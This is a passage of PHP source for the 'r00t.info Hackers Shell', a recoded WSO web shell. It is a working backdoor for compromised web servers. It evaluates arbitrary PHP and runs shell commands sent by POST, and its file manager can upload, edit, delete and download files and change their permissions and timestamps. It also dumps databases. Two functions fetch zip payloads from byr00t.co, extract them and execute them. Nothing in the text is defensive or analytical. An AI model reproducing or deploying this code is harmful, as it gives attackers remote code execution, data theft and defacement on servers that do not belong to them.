preg_replace(\'!td, th {(.*)}!msiU\',\'.e, .v, .h, .h th {$1}\',$tmp);\r\n $tmp = preg_replace(\'!body, td, th, h2, h2 {.*}!msiU\',\'\',$tmp);\r\n echo $tmp;\r\n echo \'</div><br>\';\r\n } if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo \'<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);\r\n}else{g(null,null,this.code.value,\\\'\\\');\r\n}return false;\r\n"><textarea name=code class=bigarea id=PhpCode>\'.(!empty($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'</textarea><input type=submit value=Eval style="margin-top:5px">\';\r\n echo \' <input type=checkbox name=ajax value=1 \'.(@$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX</form><pre id=PhpOutput style="\'.(empty($_POST[\'p1\'])?\'display:none;\r\n\':\'\').\'margin-top:5px;\r\n" class=ml1>\';\r\n if(!empty($_POST[\'p1\'])) { ob_start();\r\n eval($_POST[\'p1\']);\r\n echo htmlspecialchars(ob_get_clean());\r\n } echo \'</pre></div>\';\r\n printFooter();\r\n } function actionFilesMan() { printHeader();\r\n echo \'<h1>File manager</h1><div class=content>\';\r\n if(isset($_POST[\'p1\'])) { switch($_POST[\'p1\']) { case \'uploadFile\': if(!@move_uploaded_file($_FILES[\'f\'][\'tmp_name\'], $_FILES[\'f\'][\'name\'])) echo "Can\'t upload file!";\r\n break;\r\n break;\r\n case \'mkdir\': if(!@mkdir($_POST[\'p2\'])) echo "Can\'t create new dir";\r\n break;\r\n case \'delete\': function deleteDir($path) { $path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';\r\n $dh = opendir($path);\r\n while ( ($item = readdir($dh) ) !== false) { $item = $path.$item;\r\n if ( (basename($item) == "..") || (basename($item) == ".") ) continue;\r\n $type = filetype($item);\r\n if ($type == "dir") deleteDir($item);\r\n else @unlink($item);\r\n } closedir($dh);\r\n rmdir($path);\r\n } if(is_array(@$_POST[\'f\'])) foreach($_POST[\'f\'] as $f) { $f = urldecode($f);\r\n if(is_dir($f)) deleteDir($f);\r\n else @unlink($f);\r\n } break;\r\n case \'paste\': if($_SESSION[\'act\'] == \'copy\') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);\r\n $h = opendir($c.$s);\r\n while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);\r\n } } foreach($_SESSION[\'f\'] as $f) copy_paste($_SESSION[\'cwd\'],$f, $GLOBALS[\'cwd\']);\r\n } elseif($_SESSION[\'act\'] == \'move\') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);\r\n $h = opendir($c.$s);\r\n while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);\r\n } } foreach($_SESSION[\'f\'] as $f) @rename($_SESSION[\'cwd\'].$f, $GLOBALS[\'cwd\'].$f);\r\n } unset($_SESSION[\'f\']);\r\n break;\r\n default: if(!empty($_POST[\'p1\']) && (($_POST[\'p1\'] == \'copy\')||($_POST[\'p1\'] == \'move\')) ) { $_SESSION[\'act\'] = @$_POST[\'p1\'];\r\n $_SESSION[\'f\'] = @$_POST[\'f\'];\r\n foreach($_SESSION[\'f\'] as $k => $f) $_SESSION[\'f\'][$k] = urldecode($f);\r\n $_SESSION[\'cwd\'] = @$_POST[\'c\'];\r\n } break;\r\n } echo \'<script>document.mf.p1.value="";\r\ndocument.mf.p2.value="";\r\n</script>\';\r\n } $dirContent = @scandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);\r\n if($dirContent === false) { echo \'Can\\\'t open this folder!\';\r\n return;\r\n } global $sort;\r\n $sort = array(\'name\', 1);\r\n if(!empty($_POST[\'p1\'])) { if(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'p1\'], $match)) $sort = array($match[1], (int)$match[2]);\r\n } echo \'<script>\r\n function sa() {\r\n for(i=0;\r\ni<document.files.elements.length;\r\ni++)\r\n if(document.files.elements[i].type == \\\'checkbox\\\')\r\n document.files.elements[i].checked = document.files.elements[0].checked;\r\n\r\n }\r\n </script>\r\n <table width=\\\'100%\\\' class=\\\'main\\\' cellspacing=\\\'0\\\' cellpadding=\\\'2\\\'>\r\n <form name=files method=post>\';\r\n echo "<tr><th width=\'13px\'><input type=checkbox onclick=\'sa()\' class=chkbx></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_name_".($sort[1]?0:1)."\\")\'>Name</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_size_".($sort[1]?0:1)."\\")\'>Size</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_modify_".($sort[1]?0:1)."\\")\'>Modify</a></th><th>Owner/Group</th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_perms_".($sort[1]?0:1)."\\")\'>Permissions</a></th><th>Actions</th></tr>";\r\n $dirs = $files = $links = array();\r\n $n = count($dirContent);\r\n for($i=0;\r\n$i<$n;\r\n$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i]));\r\n $gr = @posix_getgrgid(@filegroup($dirContent[$i]));\r\n $tmp = array(\'name\' => $dirContent[$i], \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i], \'modify\' => @date(\'Y-m-d H:i:s\',@filemtime($GLOBALS[\'cwd\'].$dirContent[$i])), \'perms\' => viewPermsColor($GLOBALS[\'cwd\'].$dirContent[$i]), \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]), \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]), \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i]) );\r\n if(@is_file($GLOBALS[\'cwd\'].$dirContent[$i])) $files[] = array_merge($tmp, array(\'type\' => \'file\'));\r\n elseif(@is_link($GLOBALS[\'cwd\'].$dirContent[$i])) $links[] = array_merge($tmp, array(\'type\' => \'link\'));\r\n elseif(@is_dir($GLOBALS[\'cwd\'].$dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));\r\n } $GLOBALS[\'sort\'] = $sort;\r\n function cmp($a, $b) { if($GLOBALS[\'sort\'][0] != \'size\') return strcmp($a[$GLOBALS[\'sort\'][0]], $b[$GLOBALS[\'sort\'][0]])*($GLOBALS[\'sort\'][1]?1:-1);\r\n else return (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);\r\n } usort($files, "cmp");\r\n usort($dirs, "cmp");\r\n usort($links, "cmp");\r\n $files = array_merge($dirs, $links, $files);\r\n $l = 0;\r\n foreach($files as $f) { echo \'<tr\'.($l?\' class=l1\':\'\').\'><td><input type=checkbox name="f[]" value="\'.urlencode($f[\'name\']).\'" class=chkbx></td><td><a href=# onclick="\'.(($f[\'type\']==\'file\')?\'g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'view\\\')">\'.htmlspecialchars($f[\'name\']):\'g(\\\'FilesMan\\\',\\\'\'.$f[\'path\'].\'\\\');\r\n"><b>[ \'.htmlspecialchars($f[\'name\']).\' ]</b>\').\'</a></td><td>\'.(($f[\'type\']==\'file\')?viewSize($f[\'size\']):$f[\'type\']).\'</td><td>\'.$f[\'modify\'].\'</td><td>\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'</td><td><a href=# onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\',\\\'chmod\\\')">\'.$f[\'perms\'] .\'</td><td><a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'rename\\\')">R</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'touch\\\')">T</a>\'.(($f[\'type\']==\'file\')?\' <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'edit\\\')">E</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'download\\\')">D</a>\':\'\').\'</td></tr>\';\r\n $l = $l?0:1;\r\n } echo \'<tr><td colspan=5>\r\n <input type=hidden name=a value=\\\'FilesMan\\\'>\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <select name=\\\'p1\\\'><option value=\\\'copy\\\'>Copy</option><option value=\\\'move\\\'>Move</option><option value=\\\'delete\\\'>Delete</option>\';\r\n if(!empty($_SESSION[\'act\'])&&@count($_SESSION[\'f\'])){echo \'<option value=\\\'paste\\\'>Paste</option>\';\r\n } echo \'</select> \r\n<input type="submit" value=">>"></td><td colspan="2" align="right" width="1"><input name="def" value="r00t.info shell" disabled="disabled"/> \r\n<input type="submit" value="Add Deface Here" disabled="disabled"></td></tr>\r\n </form></table></div>\';\r\n printFooter();\r\n } function actionStringTools() { if(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));\r\n}} if(!function_exists(\'hex2ascii\')) {function hex2ascii($p){$r=\'\';\r\nfor($i=0;\r\n$i<strLen($p);\r\n$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));\r\n}return $r;\r\n}} if(!function_exists(\'ascii2hex\')) {function ascii2hex($p){$r=\'\';\r\nfor($i=0;\r\n$i<strlen($p);\r\n++$i)$r.= dechex(ord($p[$i]));\r\nreturn strtoupper($r);\r\n}} if(!function_exists(\'full_urlencode\')) {function full_urlencode($p){$r=\'\';\r\nfor($i=0;\r\n$i<strlen($p);\r\n++$i)$r.= \'%\'.dechex(ord($p[$i]));\r\nreturn strtoupper($r);\r\n}} if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n if(function_exists($_POST[\'p1\'])) echo $_POST[\'p1\']($_POST[\'p2\']);\r\n $temp = "document.getElementById(\'strOutput\').style.display=\'\';\r\ndocument.getElementById(\'strOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\r\n\\n";\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n echo \'<h1>String conversions</h1><div class=content>\';\r\n $stringTools = array( \'Base64 encode\' => \'base64_encode\', \'Base64 decode\' => \'base64_decode\', \'Url encode\' => \'urlencode\', \'Url decode\' => \'urldecode\', \'Full urlencode\' => \'full_urlencode\', \'md5 hash\' => \'md5\', \'sha1 hash\' => \'sha1\', \'crypt\' => \'crypt\', \'CRC32\' => \'crc32\', \'ASCII to HEX\' => \'ascii2hex\', \'HEX to ASCII\' => \'hex2ascii\', \'HEX to DEC\' => \'hexdec\', \'HEX to BIN\' => \'hex2bin\', \'DEC to HEX\' => \'dechex\', \'DEC to BIN\' => \'decbin\', \'BIN to HEX\' => \'bin2hex\', \'BIN to DEC\' => \'bindec\', \'String to lower case\' => \'strtolower\', \'String to upper case\' => \'strtoupper\', \'Htmlspecialchars\' => \'htmlspecialchars\', \'String length\' => \'strlen\', );\r\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo "<form name=\'toolsForm\' onSubmit=\'if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);\r\n}else{g(null,null,this.selectTool.value,this.input.value);\r\n} return false;\r\n\'><select name=\'selectTool\'>";\r\n foreach($stringTools as $k => $v) echo "<option value=\'".htmlspecialchars($v)."\'>".$k."</option>";\r\n echo "</select><input type=\'submit\' value=\'>>\'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\')."> send using AJAX<br><textarea name=\'input\' style=\'margin-top:5px\' class=bigarea>".htmlspecialchars(@$_POST[\'p2\'])."</textarea></form><pre class=\'ml1\' style=\'".(empty($_POST[\'p1\'])?\'display:none;\r\n\':\'\')."margin-top:5px\' id=\'strOutput\'>";\r\n if(!empty($_POST[\'p1\'])) { if(function_exists($_POST[\'p1\'])) echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\']));\r\n } echo"</pre></div>";\r\n printFooter();\r\n } function actionFilesTools() { if( isset($_POST[\'p1\']) ) $_POST[\'p1\'] = urldecode($_POST[\'p1\']);\r\n if(@$_POST[\'p2\']==\'download\') { if(is_file($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { ob_start("ob_gzhandler", 4096);\r\n header("Content-Disposition: attachment;\r\n filename=".basename($_POST[\'p1\']));\r\n if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST[\'p1\']);\r\n header("Content-Type: ".$type);\r\n } $fp = @fopen($_POST[\'p1\'], "r");\r\n if($fp) { while(!@feof($fp)) echo @fread($fp, 1024);\r\n fclose($fp);\r\n } } elseif(is_dir($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { } exit;\r\n } if( @$_POST[\'p2\'] == \'mkfile\' ) { if(!file_exists($_POST[\'p1\'])) { $fp = @fopen($_POST[\'p1\'], \'w\');\r\n if($fp) { $_POST[\'p2\'] = "edit";\r\n fclose($fp);\r\n } } } printHeader();\r\n echo \'<h1>File tools</h1><div class=content>\';\r\n if( !file_exists(@$_POST[\'p1\']) ) { echo \'File not exists\';\r\n printFooter();\r\n return;\r\n } $uid = @posix_getpwuid(@fileowner($_POST[\'p1\']));\r\n $gid = @posix_getgrgid(@fileowner($_POST[\'p1\']));\r\n echo \'<span>Name:</span> \'.htmlspecialchars($_POST[\'p1\']).\' <span>Size:</span> \'.(is_file($_POST[\'p1\'])?viewSize(filesize($_POST[\'p1\'])):\'-\').\' <span>Permission:</span> \'.viewPermsColor($_POST[\'p1\']).\' <span>Owner/Group:</span> \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'<br>\';\r\n echo \'<span>Create time:</span> \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' <span>Access time:</span> \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' <span>Modify time:</span> \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'<br><br>\';\r\n if( empty($_POST[\'p2\']) ) $_POST[\'p2\'] = \'view\';\r\n if( is_file($_POST[\'p1\']) ) $m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\');\r\n else $m = array(\'Chmod\', \'Rename\', \'Touch\');\r\n foreach($m as $v) echo \'<a href=# onclick="g(null,null,null,\\\'\'.strtolower($v).\'\\\')">\'.((strtolower($v)==@$_POST[\'p2\'])?\'<b>[ \'.$v.\' ]</b>\':$v).\'</a> \';\r\n echo \'<br><br>\';\r\n switch($_POST[\'p2\']) { case \'view\': echo \'<pre class=ml1>\';\r\n $fp = @fopen($_POST[\'p1\'], \'r\');\r\n if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));\r\n @fclose($fp);\r\n } echo \'</pre>\';\r\n break;\r\n case \'highlight\': if( is_readable($_POST[\'p1\']) ) { echo \'<div class=ml1 style="background-color: #e1e1e1;\r\ncolor:black;\r\n">\';\r\n $code = highlight_file($_POST[\'p1\'],true);\r\n echo str_replace(array(\'<span \',\'</span>\'), array(\'<font \',\'</font>\'),$code).\'</div>\';\r\n } break;\r\n case \'chmod\': if( !empty($_POST[\'p3\']) ) { $perms = 0;\r\n for($i=strlen($_POST[\'p3\'])-1;\r\n$i>=0;\r\n--$i) $perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1));\r\n if(!@chmod($_POST[\'p1\'], $perms)) echo \'Can\\\'t set permissions!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n else die(\'<script>g(null,null,null,null,"")</script>\');\r\n } echo \'<form onsubmit="g(null,null,null,null,this.chmod.value);\r\nreturn false;\r\n"><input type=text name=chmod value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'p1\'])),-4).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'edit\': if( !is_writable($_POST[\'p1\'])) { echo \'File isn\\\'t writeable\';\r\n break;\r\n } if( !empty($_POST[\'p3\']) ) { @file_put_contents($_POST[\'p1\'],$_POST[\'p3\']);\r\n echo \'Saved!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n } echo \'<form onsubmit="g(null,null,null,null,this.text.value);\r\nreturn false;\r\n"><textarea name=text class=bigarea>\';\r\n $fp = @fopen($_POST[\'p1\'], \'r\');\r\n if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));\r\n @fclose($fp);\r\n } echo \'</textarea><input type=submit value=">>"></form>\';\r\n break;\r\n case \'hexdump\': $c = @file_get_contents($_POST[\'p1\']);\r\n $n = 0;\r\n $h = array(\'00000000<br>\',\'\',\'\');\r\n $len = strlen($c);\r\n for ($i=0;\r\n $i<$len;\r\n ++$i) { $h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';\r\n switch ( ord($c[$i]) ) { case 0: $h[2] .= \' \';\r\n break;\r\n case 9: $h[2] .= \' \';\r\n break;\r\n case 10: $h[2] .= \' \';\r\n break;\r\n case 13: $h[2] .= \' \';\r\n break;\r\n default: $h[2] .= $c[$i];\r\n break;\r\n } $n++;\r\n if ($n == 32) { $n = 0;\r\n if ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'<br>\';\r\n} $h[1] .= \'<br>\';\r\n $h[2] .= "\\n";\r\n } } echo \'<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;\r\n"><pre>\'.$h[0].\'</pre></span></td><td bgcolor=#282828><pre>\'.$h[1].\'</pre></td><td bgcolor=#333333><pre>\'.htmlspecialchars($h[2]).\'</pre></td></tr></table>\';\r\n break;\r\n case \'rename\': if( !empty($_POST[\'p3\']) ) { if(!@rename($_POST[\'p1\'], $_POST[\'p3\'])) echo \'Can\\\'t rename!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n else die(\'<script>g(null,null,"\'.urlencode($_POST[\'p3\']).\'",null,"")</script>\');\r\n } echo \'<form onsubmit="g(null,null,null,null,this.name.value);\r\nreturn false;\r\n"><input type=text name=name value="\'.htmlspecialchars($_POST[\'p1\']).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'touch\': if( !empty($_POST[\'p3\']) ) { $time = strtotime($_POST[\'p3\']);\r\n if($time) { if(@touch($_POST[\'p1\'],$time,$time)) die(\'<script>g(null,null,null,null,"")</script>\');\r\n else { echo \'Fail!<script>document.mf.p3.value="";\r\n</script>\';\r\n } } else echo \'Bad time format!<script>document.mf.p3.value="";\r\n</script>\';\r\n } echo \'<form onsubmit="g(null,null,null,null,this.touch.value);\r\nreturn false;\r\n"><input type=text name=touch value="\'.date("Y-m-d H:i:s", @filemtime($_POST[\'p1\'])).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'mkfile\': break;\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionBypass() { printHeader();\r\n if(!file_exists(\'cpanel/cpanel.php\')){ $dizin = \'https://byr00t.co/vb/cpanel.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? $name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "cpanel");\r\n $zip = new ZipArchive();\r\n $file = \'cpanel.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'cpanel/\');\r\n if(file_exists(\'cpanel.zip\')){ @unlink(\'cpanel.zip\');\r\n } if($cikar){ echo "<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'cpanel/cpanel.php\')){ echo "<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionConsole() { if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n echo "document.cf.cmd.value=\'\';\r\n\\n";\r\n $temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes("\\n$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']),"\\n\\r\\t\\\\\'\\0"));\r\n if(preg_match("!.*cd\\s+([^;\r\n]+)$!",$_POST[\'p1\'],$match)) { if(@chdir($match[1])) { $GLOBALS[\'cwd\'] = @getcwd();\r\n echo "document.mf.c.value=\'".$GLOBALS[\'cwd\']."\';\r\n";\r\n } } echo "document.cf.output.value+=\'".$temp."\';\r\n";\r\n echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;\r\n";\r\n $temp = ob_get_clean();\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n echo \'<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\n\r\nvar cmds = new Array("");\r\n\r\nvar cur = 0;\r\n\r\nfunction kp(e) {\r\n var n = (window.Event) ? e.which : e.keyCode;\r\n\r\n if(n == 38) {\r\n cur--;\r\n\r\n if(cur>=0)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur++;\r\n\r\n } else if(n == 40) {\r\n cur++;\r\n\r\n if(cur < cmds.length)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur--;\r\n\r\n }\r\n}\r\nfunction add(cmd) {\r\n cmds.pop();\r\n\r\n cmds.push(cmd);\r\n\r\n cmds.push("");\r\n\r\n cur = cmds.length-1;\r\n\r\n}\r\n</script>\';\r\n echo \'<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\\\'clear\\\'){document.cf.output.value=\\\'\\\';\r\ndocument.cf.cmd.value=\\\'\\\';\r\nreturn false;\r\n}add(this.cmd.value);\r\nif(this.ajax.checked){a(null,null,this.cmd.value);\r\n}else{g(null,null,this.cmd.value);\r\n} return false;\r\n"><select name=alias>\';\r\n foreach($GLOBALS[\'aliases\'] as $n => $v) { if($v == \'\') { echo \'<optgroup label="-\'.htmlspecialchars($n).\'-"></optgroup>\';\r\n continue;\r\n } echo \'<option value="\'.htmlspecialchars($v).\'">\'.$n.\'</option>\';\r\n } if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo \'</select><input type=button onclick="add(document.cf.alias.value);\r\nif(document.cf.ajax.checked){a(null,null,document.cf.alias.value);\r\n}else{g(null,null,document.cf.alias.value);\r\n}" value=">>"> <input type=checkbox name=ajax value=1 \'.($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;\r\n" readonly>\';\r\n if(!empty($_POST[\'p1\'])) { echo htmlspecialchars("$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']));\r\n } echo \'</textarea><input type=text name=cmd style="border-top:0;\r\nwidth:100%;\r\n" onkeydown="kp(event);\r\n">\';\r\n echo \'</form></div><script>document.cf.cmd.focus();\r\n</script>\';\r\n printFooter();\r\n } function actionLogout() { unset($_SESSION[md5($_SERVER[\'HTTP_HOST\'])]);\r\n echo \'\r\n <!--r00t.info Hackers Shell-->\r\n <!--Recoded by: Smurfie-->\r\n\r\n\r\n <script>alert("Logout Successful")</script>\r\n <body bgcolor=#ffffff><center><img src="http://r00t.info/shell-dosyalar/logo.png"></center>\r\n <H1><center><p style="color: #DF0101" >r00t.info Hackers Shell</p></H1>\r\n <center>\r\n<iframe src="http://www.facebook.com/plugins/likebox.php?\r\nhref=https://www.facebook.com/r00t.info&\r\nwidth=260&\r\ncolorsche\r\nme=light&\r\nshow_faces=true&\r\nborder_color=\r\n%23fff&\r\nstream=false&\r\nheader=false&\r\nheight=100" scrolling="no" \r\nframeborder="0" style="background:transparent;\r\n border:none;\r\n overflow:hidden;\r\n width:200px;\r\n \r\nheight:100px;\r\n" allowtransparency="true"></iframe></center>\r\n <H3><marquee scrollamount="5" scrolldelay="50" width="100%"><p style="color: #DF0101" >Wso shell</p></marquee></H3></body>\';\r\n } function actionSelfRemove() { printHeader();\r\n if($_POST[\'p1\'] == \'yes\') { if(@unlink(SELF_PATH)) die(\'Shell has been removed\');\r\n else echo \'unlink error!\';\r\n } echo \'<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\\\'yes\\\')">Yes</a></div>\';\r\n printFooter();\r\n } function actionCgi() { printHeader();\r\n if(!file_exists(\'cgi/rot.cin\')){ $dizin = \'https://byr00t.co/vb/cgi.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? $name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "cgi");\r\n $zip = new ZipArchive();\r\n $file = \'cgi.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'cgi/\');\r\n if(file_exists(\'cgi.zip\')){ @unlink(\'cgi.zip\');\r\n } if($cikar){ chmod(\'cgi/rot.cin\', 0755);\r\n echo "<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'cgi/rot.cin\')){ echo "<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionSql() { class DbClass { var $type;\r\n var $link;\r\n var $res;\r\n function DbClass($type) { $this->type = $type;\r\n } function connect($host, $user, $pass, $dbname){ switch($this->type) { case \'mysql\': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;\r\n break;\r\n case \'pgsql\': $host = explode(\':\', $host);\r\n if(!$host[1]) $host[1]=5432;\r\n if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;\r\n break;\r\n } return false;\r\n } function selectdb($db) { switch($this->type) { case \'mysql\': if (@mysql_select_db($db))return true;\r\n break;\r\n } return false;\r\n } function query($str) { switch($this->type) { case \'mysql\': return $this->res = @mysql_query($str);\r\n break;\r\n case \'pgsql\': return $this->res = @pg_query($this->link,$str);\r\n break;\r\n } return false;\r\n } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res;\r\n switch($this->type) { case \'mysql\': return @mysql_fetch_assoc($res);\r\n break;\r\n case \'pgsql\': return @pg_fetch_assoc($res);\r\n break;\r\n } return false;\r\n } function listDbs() { switch($this->type) { case \'mysql\': return $this->res = @mysql_list_dbs($this->link);\r\n break;\r\n case \'pgsql\': return $this->res = $this->query("SELECT datname FROM pg_database");\r\n break;\r\n } return false;\r\n } function listTables() { switch($this->type) { case \'mysql\': return $this->res = $this->query(\'SHOW TABLES\');\r\n break;\r\n case \'pgsql\': return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != \'information_schema\' AND table_schema != \'pg_catalog\') or table_name = \'pg_user\'");\r\n break;\r\n } return false;\r\n } function error() { switch($this->type) { case \'mysql\': return @mysql_error($this->link);\r\n break;\r\n case \'pgsql\': return @pg_last_error($this->link);\r\n break;\r\n } return false;\r\n } function setCharset($str) { switch($this->type) { case \'mysql\': if(function_exists(\'mysql_set_charset\')) return @mysql_set_charset($str, $this->link);\r\n else $this->query(\'SET CHARSET \'.$str);\r\n break;\r\n case \'mysql\': return @pg_set_client_encoding($this->link, $str);\r\n break;\r\n } return false;\r\n } function dump($table) { switch($this->type) { case \'mysql\': $res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\');\r\n $create = mysql_fetch_array($res);\r\n echo $create[1].";\r\n\\n\\n";\r\n $this->query(\'SELECT * FROM `\'.$table.\'`\');\r\n while($item = $this->fetch()) { $columns = array();\r\n foreach($item as $k=>$v) { $item[$k] = "\'".@mysql_real_escape_string($v)."\'";\r\n $columns[] = "`".$k."`";\r\n } echo \'INSERT INTO `\'.$table.\'` 